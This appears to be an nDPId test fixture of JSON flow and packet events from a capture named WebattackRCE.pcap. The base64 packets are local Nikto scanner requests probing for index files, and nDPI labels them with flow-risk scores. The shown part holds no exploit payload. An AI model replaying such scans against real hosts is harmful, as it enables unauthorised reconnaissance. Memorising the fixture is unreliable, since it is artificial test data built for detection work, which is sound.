00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1576420276803,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276803,"pkt":"AAAAAAAAAAAAAAAACABFAADGlY9AAEAGpqB\/AAABfwAAAcI6H5C5Ma2+n2Qvb4AYAED+ugAAAQEICp1m+2udZvtrR0VUIC9pbmRleC5waHAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1576420276804,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276804,"pkt":"AAAAAAAAAAAAAAAACABFAADHUClAAEAG7AV\/AAABfwAAAcI8H5AXCWgXkPGhe4AYAED+uwAAAQEICp1m+2ydZvtsR0VUIC9pbmRleC5waHAzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1576420276806,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276806,"pkt":"AAAAAAAAAAAAAAAACABFAADHuG9AAEAGg79\/AAABfwAAAcI+H5DOCYBdLPnSzYAYAED+uwAAAQEICp1m+26dZvtuR0VUIC9pbmRleC5waHA0IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php4","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1576420276807,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276807,"pkt":"AAAAAAAAAAAAAAAACABFAADHnVlAAEAGntV\/AAABfwAAAcJAH5BrmKVmTh6XdYAYAED+uwAAAQEICp1m+2+dZvtvR0VUIC9pbmRleC5waHA1IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php5","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1576420276809,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276809,"pkt":"AAAAAAAAAAAAAAAACABFAADHz9VAAEAGbFl\/AAABfwAAAcJCH5Dtpvfi4owoVYAYAED+uwAAAQEICp1m+3GdZvtwR0VUIC9pbmRleC5waHA3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php7","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1576420276810,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276810,"pkt":"AAAAAAAAAAAAAAAACABFAADH5lRAAEAGVdp\/AAABfwAAAcJEH5B9+95hKQN6FIAYAED+uwAAAQEICp1m+3KdZvtyR0VUIC9pbmRleC5odG1sIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1576420276812,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276812,"pkt":"AAAAAAAAAAAAAAAACABFAADGlhlAAEAGphZ\/AAABfwAAAcJGH5DYta4lttm384AYAED+ugAAAQEICp1m+3OdZvtzR0VUIC9pbmRleC5odG0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1576420276813,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276813,"pkt":"AAAAAAAAAAAAAAAACABFAADI2h9AAEAGYg5\/AAABfwAAAcJIH5At6uIveFvtbIAYAED+vAAAAQEICp1m+3WdZvt1R0VUIC9pbmRleC5zaHRtbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.shtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1576420276815,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276815,"pkt":"AAAAAAAAAAAAAAAACABFAADGtzZAAEAGhPl\/AAABfwAAAcJKH5BukY8IX6sJe4AYAED+ugAAAQEICp1m+3edZvt2R0VUIC9pbmRleC5jZm0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1576420276817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276817,"pkt":"AAAAAAAAAAAAAAAACABFAADGzfJAAEAGbj1\/AAABfwAAAcJMH5CEyfXFi\/ZWqoAYAED+ugAAAQEICp1m+3mdZvt5R0VUIC9pbmRleC5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1576420276819,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276819,"pkt":"AAAAAAAAAAAAAAAACABFAADFj3JAAEAGrL5\/AAABfwAAAcJOH5DAfLdF0MycV4AYAED+uQAAAQEICp1m+3udZvt7R0VUIC9pbmRleC5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
